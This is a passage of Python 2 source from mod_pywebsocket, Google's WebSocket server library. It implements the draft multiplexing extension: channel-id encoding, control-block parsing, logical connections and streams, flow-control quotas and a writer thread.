# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides classes and helper functions for multiplexing extension.
Specification:
http://tools.ietf.org/html/draft-ietf-hybi-websocket-multiplexing-06
"""
import collections
import copy
import email
import email.parser
import logging
import math
import struct
import threading
import traceback
from mod_pywebsocket import common
from mod_pywebsocket import handshake
from mod_pywebsocket import util
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_hybi import Frame
from mod_pywebsocket._stream_hybi import Stream
from mod_pywebsocket._stream_hybi import StreamOptions
from mod_pywebsocket._stream_hybi import create_binary_frame
from mod_pywebsocket._stream_hybi import create_closing_handshake_body
from mod_pywebsocket._stream_hybi import create_header
from mod_pywebsocket._stream_hybi import create_length_header
from mod_pywebsocket._stream_hybi import parse_frame
from mod_pywebsocket.handshake import hybi
_CONTROL_CHANNEL_ID = 0
_DEFAULT_CHANNEL_ID = 1
_MUX_OPCODE_ADD_CHANNEL_REQUEST = 0
_MUX_OPCODE_ADD_CHANNEL_RESPONSE = 1
_MUX_OPCODE_FLOW_CONTROL = 2
_MUX_OPCODE_DROP_CHANNEL = 3
_MUX_OPCODE_NEW_CHANNEL_SLOT = 4
_MAX_CHANNEL_ID = 2 ** 29 - 1
_INITIAL_NUMBER_OF_CHANNEL_SLOTS = 64
_INITIAL_QUOTA_FOR_CLIENT = 8 * 1024
_HANDSHAKE_ENCODING_IDENTITY = 0
_HANDSHAKE_ENCODING_DELTA = 1
# We need only these status code for now.
_HTTP_BAD_RESPONSE_MESSAGES = {
common.HTTP_STATUS_BAD_REQUEST: 'Bad Request',
}
# DropChannel reason code
# TODO(bashi): Define all reason code defined in -05 draft.
_DROP_CODE_NORMAL_CLOSURE = 1000
_DROP_CODE_INVALID_ENCAPSULATING_MESSAGE = 2001
_DROP_CODE_CHANNEL_ID_TRUNCATED = 2002
_DROP_CODE_ENCAPSULATED_FRAME_IS_TRUNCATED = 2003
_DROP_CODE_UNKNOWN_MUX_OPCODE = 2004
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK = 2005
_DROP_CODE_CHANNEL_ALREADY_EXISTS = 2006
_DROP_CODE_NEW_CHANNEL_SLOT_VIOLATION = 2007
_DROP_CODE_UNKNOWN_REQUEST_ENCODING = 2010
_DROP_CODE_SEND_QUOTA_VIOLATION = 3005
_DROP_CODE_SEND_QUOTA_OVERFLOW = 3006
_DROP_CODE_ACKNOWLEDGED = 3008
_DROP_CODE_BAD_FRAGMENTATION = 3009
class MuxUnexpectedException(Exception):
"""Exception in handling multiplexing extension."""
pass
# Temporary
class MuxNotImplementedException(Exception):
"""Raised when a flow enters unimplemented code path."""
pass
class LogicalConnectionClosedException(Exception):
"""Raised when logical connection is gracefully closed."""
pass
class PhysicalConnectionError(Exception):
"""Raised when there is a physical connection error."""
def __init__(self, drop_code, message=''):
super(PhysicalConnectionError, self).__init__(
'code=%d, message=%r' % (drop_code, message))
self.drop_code = drop_code
self.message = message
class LogicalChannelError(Exception):
"""Raised when there is a logical channel error."""
def __init__(self, channel_id, drop_code, message=''):
super(LogicalChannelError, self).__init__(
'channel_id=%d, code=%d, message=%r' % (
channel_id, drop_code, message))
self.channel_id = channel_id
self.drop_code = drop_code
self.message = message
def _encode_channel_id(channel_id):
if channel_id < 0:
raise ValueError('Channel id %d must not be negative' % channel_id)
if channel_id < 2 ** 7:
return chr(channel_id)
if channel_id < 2 ** 14:
return struct.pack('!H', 0x8000 + channel_id)
if channel_id < 2 ** 21:
first = chr(0xc0 + (channel_id >> 16))
return first + struct.pack('!H', channel_id & 0xffff)
if channel_id < 2 ** 29:
return struct.pack('!L', 0xe0000000 + channel_id)
raise ValueError('Channel id %d is too large' % channel_id)
def _encode_number(number):
return create_length_header(number, False)
def _create_add_channel_response(channel_id, encoded_handshake,
encoding=0, rejected=False):
if encoding != 0 and encoding != 1:
raise ValueError('Invalid encoding %d' % encoding)
first_byte = ((_MUX_OPCODE_ADD_CHANNEL_RESPONSE << 5) |
(rejected << 4) | encoding)
block = (chr(first_byte) +
_encode_channel_id(channel_id) +
_encode_number(len(encoded_handshake)) +
encoded_handshake)
return block
def _create_drop_channel(channel_id, code=None, message=''):
if len(message) > 0 and code is None:
raise ValueError('Code must be specified if message is specified')
first_byte = _MUX_OPCODE_DROP_CHANNEL << 5
block = chr(first_byte) + _encode_channel_id(channel_id)
if code is None:
block += _encode_number(0) # Reason size
else:
reason = struct.pack('!H', code) + message
reason_size = _encode_number(len(reason))
block += reason_size + reason
return block
def _create_flow_control(channel_id, replenished_quota):
first_byte = _MUX_OPCODE_FLOW_CONTROL << 5
block = (chr(first_byte) +
_encode_channel_id(channel_id) +
_encode_number(replenished_quota))
return block
def _create_new_channel_slot(slots, send_quota):
if slots < 0 or send_quota < 0:
raise ValueError('slots and send_quota must be non-negative.')
first_byte = _MUX_OPCODE_NEW_CHANNEL_SLOT << 5
block = (chr(first_byte) +
_encode_number(slots) +
_encode_number(send_quota))
return block
def _create_fallback_new_channel_slot():
first_byte = (_MUX_OPCODE_NEW_CHANNEL_SLOT << 5) | 1 # Set the F flag
block = (chr(first_byte) + _encode_number(0) + _encode_number(0))
return block
def _parse_request_text(request_text):
request_line, header_lines = request_text.split('\r\n', 1)
words = request_line.split(' ')
if len(words) != 3:
raise ValueError('Bad Request-Line syntax %r' % request_line)
[command, path, version] = words
if version != 'HTTP/1.1':
raise ValueError('Bad request version %r' % version)
# email.parser.Parser() parses RFC 2822 (RFC 822) style headers.
# RFC 6455 refers RFC 2616 for handshake parsing, and RFC 2616 refers
# RFC 822.
headers = email.parser.Parser().parsestr(header_lines)
return command, path, version, headers
class _ControlBlock(object):
"""A structure that holds parsing result of multiplexing control block.
Control block specific attributes will be added by _MuxFramePayloadParser.
(e.g. encoded_handshake will be added for AddChannelRequest and
AddChannelResponse)
"""
def __init__(self, opcode):
self.opcode = opcode
class _MuxFramePayloadParser(object):
"""A class that parses multiplexed frame payload."""
def __init__(self, payload):
self._data = payload
self._read_position = 0
self._logger = util.get_class_logger(self)
def read_channel_id(self):
"""Reads channel id.
Raises:
ValueError: when the payload doesn't contain
valid channel id.
"""
remaining_length = len(self._data) - self._read_position
pos = self._read_position
if remaining_length == 0:
raise ValueError('Invalid channel id format')
channel_id = ord(self._data[pos])
channel_id_length = 1
if channel_id & 0xe0 == 0xe0:
if remaining_length < 4:
raise ValueError('Invalid channel id format')
channel_id = struct.unpack('!L',
self._data[pos:pos+4])[0] & 0x1fffffff
channel_id_length = 4
elif channel_id & 0xc0 == 0xc0:
if remaining_length < 3:
raise ValueError('Invalid channel id format')
channel_id = (((channel_id & 0x1f) << 16) +
struct.unpack('!H', self._data[pos+1:pos+3])[0])
channel_id_length = 3
elif channel_id & 0x80 == 0x80:
if remaining_length < 2:
raise ValueError('Invalid channel id format')
channel_id = struct.unpack('!H',
self._data[pos:pos+2])[0] & 0x3fff
channel_id_length = 2
self._read_position += channel_id_length
return channel_id
def read_inner_frame(self):
"""Reads an inner frame.
Raises:
PhysicalConnectionError: when the inner frame is invalid.
"""
if len(self._data) == self._read_position:
raise PhysicalConnectionError(
_DROP_CODE_ENCAPSULATED_FRAME_IS_TRUNCATED)
bits = ord(self._data[self._read_position])
self._read_position += 1
fin = (bits & 0x80) == 0x80
rsv1 = (bits & 0x40) == 0x40
rsv2 = (bits & 0x20) == 0x20
rsv3 = (bits & 0x10) == 0x10
opcode = bits & 0xf
payload = self.remaining_data()
# Consume rest of the message which is payload data of the original
# frame.
self._read_position = len(self._data)
return fin, rsv1, rsv2, rsv3, opcode, payload
def _read_number(self):
if self._read_position + 1 > len(self._data):
raise ValueError(
'Cannot read the first byte of number field')
number = ord(self._data[self._read_position])
if number & 0x80 == 0x80:
raise ValueError(
'The most significant bit of the first byte of number should '
'be unset')
self._read_position += 1
pos = self._read_position
if number == 127:
if pos + 8 > len(self._data):
raise ValueError('Invalid number field')
self._read_position += 8
number = struct.unpack('!Q', self._data[pos:pos+8])[0]
if number > 0x7FFFFFFFFFFFFFFF:
raise ValueError('Encoded number(%d) >= 2^63' % number)
if number <= 0xFFFF:
raise ValueError(
'%d should not be encoded by 9 bytes encoding' % number)
return number
if number == 126:
if pos + 2 > len(self._data):
raise ValueError('Invalid number field')
self._read_position += 2
number = struct.unpack('!H', self._data[pos:pos+2])[0]
if number <= 125:
raise ValueError(
'%d should not be encoded by 3 bytes encoding' % number)
return number
def _read_size_and_contents(self):
"""Reads data that consists of followings:
- the size of the contents encoded the same way as payload length
of the WebSocket Protocol with 1 bit padding at the head.
- the contents.
"""
try:
size = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
pos = self._read_position
if pos + size > len(self._data):
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Cannot read %d bytes data' % size)
self._read_position += size
return self._data[pos:pos+size]
def _read_add_channel_request(self, first_byte, control_block):
reserved = (first_byte >> 2) & 0x7
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
# Invalid encoding will be handled by MuxHandler.
encoding = first_byte & 0x3
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
control_block.encoding = encoding
encoded_handshake = self._read_size_and_contents()
control_block.encoded_handshake = encoded_handshake
return control_block
def _read_add_channel_response(self, first_byte, control_block):
reserved = (first_byte >> 2) & 0x3
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
control_block.accepted = (first_byte >> 4) & 1
control_block.encoding = first_byte & 0x3
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
control_block.encoded_handshake = self._read_size_and_contents()
return control_block
def _read_flow_control(self, first_byte, control_block):
reserved = first_byte & 0x1f
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
try:
control_block.channel_id = self.read_channel_id()
control_block.send_quota = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
return control_block
def _read_drop_channel(self, first_byte, control_block):
reserved = first_byte & 0x1f
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
reason = self._read_size_and_contents()
if len(reason) == 0:
control_block.drop_code = None
control_block.drop_message = ''
elif len(reason) >= 2:
control_block.drop_code = struct.unpack('!H', reason[:2])[0]
control_block.drop_message = reason[2:]
else:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received DropChannel that conains only 1-byte reason')
return control_block
def _read_new_channel_slot(self, first_byte, control_block):
reserved = first_byte & 0x1e
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
control_block.fallback = first_byte & 1
try:
control_block.slots = self._read_number()
control_block.send_quota = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
return control_block
def read_control_blocks(self):
"""Reads control block(s).
Raises:
PhysicalConnectionError: when the payload contains invalid control
block(s).
StopIteration: when no control blocks left.
"""
while self._read_position < len(self._data):
first_byte = ord(self._data[self._read_position])
self._read_position += 1
opcode = (first_byte >> 5) & 0x7
control_block = _ControlBlock(opcode=opcode)
if opcode == _MUX_OPCODE_ADD_CHANNEL_REQUEST:
yield self._read_add_channel_request(first_byte, control_block)
elif opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
yield self._read_add_channel_response(
first_byte, control_block)
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
yield self._read_flow_control(first_byte, control_block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
yield self._read_drop_channel(first_byte, control_block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
yield self._read_new_channel_slot(first_byte, control_block)
else:
raise PhysicalConnectionError(
_DROP_CODE_UNKNOWN_MUX_OPCODE,
'Invalid opcode %d' % opcode)
assert self._read_position == len(self._data)
raise StopIteration
def remaining_data(self):
"""Returns remaining data."""
return self._data[self._read_position:]
class _LogicalRequest(object):
"""Mimics mod_python request."""
def __init__(self, channel_id, command, path, protocol, headers,
connection):
"""Constructs an instance.
Args:
channel_id: the channel id of the logical channel.
command: HTTP request command.
path: HTTP request path.
headers: HTTP headers.
connection: _LogicalConnection instance.
"""
self.channel_id = channel_id
self.method = command
self.uri = path
self.protocol = protocol
self.headers_in = headers
self.connection = connection
self.server_terminated = False
self.client_terminated = False
def is_https(self):
"""Mimics request.is_https(). Returns False because this method is
used only by old protocols (hixie and hybi00).
"""
return False
class _LogicalConnection(object):
"""Mimics mod_python mp_conn."""
# For details, see the comment of set_read_state().
STATE_ACTIVE = 1
STATE_GRACEFULLY_CLOSED = 2
STATE_TERMINATED = 3
def __init__(self, mux_handler, channel_id):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
channel_id: channel id of this connection.
"""
self._mux_handler = mux_handler
self._channel_id = channel_id
self._incoming_data = ''
# - Protects _waiting_write_completion
# - Signals the thread waiting for completion of write by mux handler
self._write_condition = threading.Condition()
self._waiting_write_completion = False
self._read_condition = threading.Condition()
self._read_state = self.STATE_ACTIVE
def get_local_addr(self):
"""Getter to mimic mp_conn.local_addr."""
return self._mux_handler.physical_connection.get_local_addr()
local_addr = property(get_local_addr)
def get_remote_addr(self):
"""Getter to mimic mp_conn.remote_addr."""
return self._mux_handler.physical_connection.get_remote_addr()
remote_addr = property(get_remote_addr)
def get_memorized_lines(self):
"""Gets memorized lines. Not supported."""
raise MuxUnexpectedException('_LogicalConnection does not support '
'get_memorized_lines')
def write(self, data):
"""Writes data. mux_handler sends data asynchronously. The caller will
be suspended until write done.
Args:
data: data to be written.
Raises:
MuxUnexpectedException: when called before finishing the previous
write.
"""
try:
self._write_condition.acquire()
if self._waiting_write_completion:
raise MuxUnexpectedException(
'Logical connection %d is already waiting the completion '
'of write' % self._channel_id)
self._waiting_write_completion = True
self._mux_handler.send_data(self._channel_id, data)
self._write_condition.wait()
# TODO(tyoshino): Raise an exception if woke up by on_writer_done.
finally:
self._write_condition.release()
def write_control_data(self, data):
"""Writes data via the control channel. Don't wait finishing write
because this method can be called by mux dispatcher.
Args:
data: data to be written.
"""
self._mux_handler.send_control_data(data)
def on_write_data_done(self):
"""Called when sending data is completed."""
try:
self._write_condition.acquire()
if not self._waiting_write_completion:
raise MuxUnexpectedException(
'Invalid call of on_write_data_done for logical '
'connection %d' % self._channel_id)
self._waiting_write_completion = False
self._write_condition.notify()
finally:
self._write_condition.release()
def on_writer_done(self):
"""Called by the mux handler when the writer thread has finished."""
try:
self._write_condition.acquire()
self._waiting_write_completion = False
self._write_condition.notify()
finally:
self._write_condition.release()
def append_frame_data(self, frame_data):
"""Appends incoming frame data. Called when mux_handler dispatches
frame data to the corresponding application.
Args:
frame_data: incoming frame data.
"""
self._read_condition.acquire()
self._incoming_data += frame_data
self._read_condition.notify()
self._read_condition.release()
def read(self, length):
"""Reads data. Blocks until enough data has arrived via physical
connection.
Args:
length: length of data to be read.
Raises:
LogicalConnectionClosedException: when closing handshake for this
logical channel has been received.
ConnectionTerminatedException: when the physical connection has
closed, or an error is caused on the reader thread.
"""
self._read_condition.acquire()
while (self._read_state == self.STATE_ACTIVE and
len(self._incoming_data) < length):
self._read_condition.wait()
try:
if self._read_state == self.STATE_GRACEFULLY_CLOSED:
raise LogicalConnectionClosedException(
'Logical channel %d has closed.' % self._channel_id)
elif self._read_state == self.STATE_TERMINATED:
raise ConnectionTerminatedException(
'Receiving %d byte failed. Logical channel (%d) closed' %
(length, self._channel_id))
value = self._incoming_data[:length]
self._incoming_data = self._incoming_data[length:]
finally:
self._read_condition.release()
return value
def set_read_state(self, new_state):
"""Sets the state of this connection. Called when an event for this
connection has occurred.
Args:
new_state: state to be set. new_state must be one of followings:
- STATE_GRACEFULLY_CLOSED: when closing handshake for this
connection has been received.
- STATE_TERMINATED: when the physical connection has closed or
DropChannel of this connection has received.
"""
self._read_condition.acquire()
self._read_state = new_state
self._read_condition.notify()
self._read_condition.release()
class _InnerMessage(object):
"""Holds the result of _InnerMessageBuilder.build().
"""
def __init__(self, opcode, payload):
self.opcode = opcode
self.payload = payload
class _InnerMessageBuilder(object):
"""A class that holds the context of inner message fragmentation and
builds a message from fragmented inner frame(s).
"""
def __init__(self):
self._control_opcode = None
self._pending_control_fragments = []
self._message_opcode = None
self._pending_message_fragments = []
self._frame_handler = self._handle_first
def _handle_first(self, frame):
if frame.opcode == common.OPCODE_CONTINUATION:
raise InvalidFrameException('Sending invalid continuation opcode')
if common.is_control_opcode(frame.opcode):
return self._process_first_fragmented_control(frame)
else:
return self._process_first_fragmented_message(frame)
def _process_first_fragmented_control(self, frame):
self._control_opcode = frame.opcode
self._pending_control_fragments.append(frame.payload)
if not frame.fin:
self._frame_handler = self._handle_fragmented_control
return None
return self._reassemble_fragmented_control()
def _process_first_fragmented_message(self, frame):
self._message_opcode = frame.opcode
self._pending_message_fragments.append(frame.payload)
if not frame.fin:
self._frame_handler = self._handle_fragmented_message
return None
return self._reassemble_fragmented_message()
def _handle_fragmented_control(self, frame):
if frame.opcode != common.OPCODE_CONTINUATION:
raise InvalidFrameException(
'Sending invalid opcode %d while sending fragmented control '
'message' % frame.opcode)
self._pending_control_fragments.append(frame.payload)
if not frame.fin:
return None
return self._reassemble_fragmented_control()
def _reassemble_fragmented_control(self):
opcode = self._control_opcode
payload = ''.join(self._pending_control_fragments)
self._control_opcode = None
self._pending_control_fragments = []
if self._message_opcode is not None:
self._frame_handler = self._handle_fragmented_message
else:
self._frame_handler = self._handle_first
return _InnerMessage(opcode, payload)
def _handle_fragmented_message(self, frame):
# Sender can interleave a control message while sending fragmented
# messages.
if common.is_control_opcode(frame.opcode):
if self._control_opcode is not None:
raise MuxUnexpectedException(
'Should not reach here(Bug in builder)')
return self._process_first_fragmented_control(frame)
if frame.opcode != common.OPCODE_CONTINUATION:
raise InvalidFrameException(
'Sending invalid opcode %d while sending fragmented message' %
frame.opcode)
self._pending_message_fragments.append(frame.payload)
if not frame.fin:
return None
return self._reassemble_fragmented_message()
def _reassemble_fragmented_message(self):
opcode = self._message_opcode
payload = ''.join(self._pending_message_fragments)
self._message_opcode = None
self._pending_message_fragments = []
self._frame_handler = self._handle_first
return _InnerMessage(opcode, payload)
def build(self, frame):
"""Build an inner message. Returns an _InnerMessage instance when
the given frame is the last fragmented frame. Returns None otherwise.
Args:
frame: an inner frame.
Raises:
InvalidFrameException: when received invalid opcode. (e.g.
receiving non continuation data opcode but the fin flag of
the previous inner frame was not set.)
"""
return self._frame_handler(frame)
class _LogicalStream(Stream):
"""Mimics the Stream class. This class interprets multiplexed WebSocket
frames.
"""
def __init__(self, request, stream_options, send_quota, receive_quota):
"""Constructs an instance.
Args:
request: _LogicalRequest instance.
stream_options: StreamOptions instance.
send_quota: Initial send quota.
receive_quota: Initial receive quota.
"""
# Physical stream is responsible for masking.
stream_options.unmask_receive = False
Stream.__init__(self, request, stream_options)
self._send_closed = False
self._send_quota = send_quota
# - Protects _send_closed and _send_quota
# - Signals the thread waiting for send quota replenished
self._send_condition = threading.Condition()
# The opcode of the first frame in messages.
self._message_opcode = common.OPCODE_TEXT
# True when the last message was fragmented.
self._last_message_was_fragmented = False
self._receive_quota = receive_quota
self._write_inner_frame_semaphore = threading.Semaphore()
self._inner_message_builder = _InnerMessageBuilder()
def _create_inner_frame(self, opcode, payload, end=True):
frame = Frame(fin=end, opcode=opcode, payload=payload)
for frame_filter in self._options.outgoing_frame_filters:
frame_filter.filter(frame)
if len(payload) != len(frame.payload):
raise MuxUnexpectedException(
'Mux extension must not be used after extensions which change '
' frame boundary')
first_byte = ((frame.fin << 7) | (frame.rsv1 << 6) |
(frame.rsv2 << 5) | (frame.rsv3 << 4) | frame.opcode)
return chr(first_byte) + frame.payload
def _write_inner_frame(self, opcode, payload, end=True):
payload_length = len(payload)
write_position = 0
try:
# An inner frame will be fragmented if there is no enough send
# quota. This semaphore ensures that fragmented inner frames are
# sent in order on the logical channel.
# Note that frames that come from other logical channels or
# multiplexing control blocks can be inserted between fragmented
# inner frames on the physical channel.
self._write_inner_frame_semaphore.acquire()
# Consume an octet quota when this is the first fragmented frame.
if opcode != common.OPCODE_CONTINUATION:
try:
self._send_condition.acquire()
while (not self._send_closed) and self._send_quota == 0:
self._send_condition.wait()
if self._send_closed:
raise BadOperationException(
'Logical connection %d is closed' %
self._request.channel_id)
self._send_quota -= 1
finally:
self._send_condition.release()
while write_position < payload_length:
try:
self._send_condition.acquire()
while (not self._send_closed) and self._send_quota == 0:
self._logger.debug(
'No quota. Waiting FlowControl message for %d.' %
self._request.channel_id)
self._send_condition.wait()
if self._send_closed:
raise BadOperationException(
'Logical connection %d is closed' %
self.request._channel_id)
remaining = payload_length - write_position
write_length = min(self._send_quota, remaining)
inner_frame_end = (
end and
(write_position + write_length == payload_length))
inner_frame = self._create_inner_frame(
opcode,
payload[write_position:write_position+write_length],
inner_frame_end)
self._send_quota -= write_length
self._logger.debug('Consumed quota=%d, remaining=%d' %
(write_length, self._send_quota))
finally:
self._send_condition.release()
# Writing data will block the worker so we need to release
# _send_condition before writing.
self._logger.debug('Sending inner frame: %r' % inner_frame)
self._request.connection.write(inner_frame)
write_position += write_length
opcode = common.OPCODE_CONTINUATION
except ValueError, e:
raise BadOperationException(e)
finally:
self._write_inner_frame_semaphore.release()
def replenish_send_quota(self, send_quota):
"""Replenish send quota."""
try:
self._send_condition.acquire()
if self._send_quota + send_quota > 0x7FFFFFFFFFFFFFFF:
self._send_quota = 0
raise LogicalChannelError(
self._request.channel_id, _DROP_CODE_SEND_QUOTA_OVERFLOW)
self._send_quota += send_quota
self._logger.debug('Replenished send quota for channel id %d: %d' %
(self._request.channel_id, self._send_quota))
finally:
self._send_condition.notify()
self._send_condition.release()
def consume_receive_quota(self, amount):
"""Consumes receive quota. Returns False on failure."""
if self._receive_quota < amount:
self._logger.debug('Violate quota on channel id %d: %d < %d' %
(self._request.channel_id,
self._receive_quota, amount))
return False
self._receive_quota -= amount
return True
def send_message(self, message, end=True, binary=False):
"""Override Stream.send_message."""
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
if binary and isinstance(message, unicode):
raise BadOperationException(
'Message for binary frame must be instance of str')
if binary:
opcode = common.OPCODE_BINARY
else:
opcode = common.OPCODE_TEXT
message = message.encode('utf-8')
for message_filter in self._options.outgoing_message_filters:
message = message_filter.filter(message, end, binary)
if self._last_message_was_fragmented:
if opcode != self._message_opcode:
raise BadOperationException('Message types are different in '
'frames for the same message')
opcode = common.OPCODE_CONTINUATION
else:
self._message_opcode = opcode
self._write_inner_frame(opcode, message, end)
self._last_message_was_fragmented = not end
def _receive_frame(self):
"""Overrides Stream._receive_frame.
In addition to call Stream._receive_frame, this method adds the amount
of payload to receiving quota and sends FlowControl to the client.
We need to do it here because Stream.receive_message() handles
control frames internally.
"""
opcode, payload, fin, rsv1, rsv2, rsv3 = Stream._receive_frame(self)
amount = len(payload)
# Replenish extra one octet when receiving the first fragmented frame.
if opcode != common.OPCODE_CONTINUATION:
amount += 1
self._receive_quota += amount
frame_data = _create_flow_control(self._request.channel_id,
amount)
self._logger.debug('Sending flow control for %d, replenished=%d' %
(self._request.channel_id, amount))
self._request.connection.write_control_data(frame_data)
return opcode, payload, fin, rsv1, rsv2, rsv3
def _get_message_from_frame(self, frame):
"""Overrides Stream._get_message_from_frame.
"""
try:
inner_message = self._inner_message_builder.build(frame)
except InvalidFrameException:
raise LogicalChannelError(
self._request.channel_id, _DROP_CODE_BAD_FRAGMENTATION)
if inner_message is None:
return None
self._original_opcode = inner_message.opcode
return inner_message.payload
def receive_message(self):
"""Overrides Stream.receive_message."""
# Just call Stream.receive_message(), but catch
# LogicalConnectionClosedException, which is raised when the logical
# connection has closed gracefully.
try:
return Stream.receive_message(self)
except LogicalConnectionClosedException, e:
self._logger.debug('%s', e)
return None
def _send_closing_handshake(self, code, reason):
"""Overrides Stream._send_closing_handshake."""
body = create_closing_handshake_body(code, reason)
self._logger.debug('Sending closing handshake for %d: (%r, %r)' %
(self._request.channel_id, code, reason))
self._write_inner_frame(common.OPCODE_CLOSE, body, end=True)
self._request.server_terminated = True
def send_ping(self, body=''):
"""Overrides Stream.send_ping"""
self._logger.debug('Sending ping on logical channel %d: %r' %
(self._request.channel_id, body))
self._write_inner_frame(common.OPCODE_PING, body, end=True)
self._ping_queue.append(body)
def _send_pong(self, body):
"""Overrides Stream._send_pong"""
self._logger.debug('Sending pong on logical channel %d: %r' %
(self._request.channel_id, body))
self._write_inner_frame(common.OPCODE_PONG, body, end=True)
def close_connection(self, code=common.STATUS_NORMAL_CLOSURE, reason=''):
"""Overrides Stream.close_connection."""
# TODO(bashi): Implement
self._logger.debug('Closing logical connection %d' %
self._request.channel_id)
self._request.server_terminated = True
def stop_sending(self):
"""Stops accepting new send operation (_write_inner_frame)."""
self._send_condition.acquire()
self._send_closed = True
self._send_condition.notify()
self._send_condition.release()
class _OutgoingData(object):
"""A structure that holds data to be sent via physical connection and
origin of the data.
"""
def __init__(self, channel_id, data):
self.channel_id = channel_id
self.data = data
class _PhysicalConnectionWriter(threading.Thread):
"""A thread that is responsible for writing data to physical connection.
TODO(bashi): Make sure there is no thread-safety problem when the reader
thread reads data from the same socket at a time.
"""
def __init__(self, mux_handler):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self.setDaemon(True)
# When set, make this thread stop accepting new data, flush pending
# data and exit.
self._stop_requested = False
# The close code of the physical connection.
self._close_code = common.STATUS_NORMAL_CLOSURE
# Deque for passing write data. It's protected by _deque_condition
# until _stop_requested is set.
self._deque = collections.deque()
# - Protects _deque, _stop_requested and _close_code
# - Signals threads waiting for them to be available
self._deque_condition = threading.Condition()
def put_outgoing_data(self, data):
"""Puts outgoing data.
Args:
data: _OutgoingData instance.
Raises:
BadOperationException: when the thread has been requested to
terminate.
"""
try:
self._deque_condition.acquire()
if self._stop_requested:
raise BadOperationException('Cannot write data anymore')
self._deque.append(data)
self._deque_condition.notify()
finally:
self._deque_condition.release()
def _write_data(self, outgoing_data):
message = (_encode_channel_id(outgoing_data.channel_id) +
outgoing_data.data)
try:
self._mux_handler.physical_stream.send_message(
message=message, end=True, binary=True)
except Exception, e:
util.prepend_message_to_exception(
'Failed to send message to %r: ' %
(self._mux_handler.physical_connection.remote_addr,), e)
raise
# TODO(bashi): It would be better to block the thread that sends
# control data as well.
if outgoing_data.channel_id != _CONTROL_CHANNEL_ID:
self._mux_handler.notify_write_data_done(outgoing_data.channel_id)
def run(self):
try:
self._deque_condition.acquire()
while not self._stop_requested:
if len(self._deque) == 0:
self._deque_condition.wait()
continue
outgoing_data = self._deque.popleft()
self._deque_condition.release()
self._write_data(outgoing_data)
self._deque_condition.acquire()
# Flush deque.
#
# At this point, self._deque_condition is always acquired.
try:
while len(self._deque) > 0:
outgoing_data = self._deque.popleft()
self._write_data(outgoing_data)
finally:
self._deque_condition.release()
# Close physical connection.
try:
# Don't wait the response here. The response will be read
# by the reader thread.
self._mux_handler.physical_stream.close_connection(
self._close_code, wait_response=False)
except Exception, e:
util.prepend_message_to_exception(
'Failed to close the physical connection: %r' % e)
raise
finally:
self._mux_handler.notify_writer_done()
def stop(self, close_code=common.STATUS_NORMAL_CLOSURE):
"""Stops the writer thread."""
self._deque_condition.acquire()
self._stop_requested = True
self._close_code = close_code
self._deque_condition.notify()
self._deque_condition.release()
class _PhysicalConnectionReader(threading.Thread):
"""A thread that is responsible for reading data from physical connection.
"""
def __init__(self, mux_handler):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
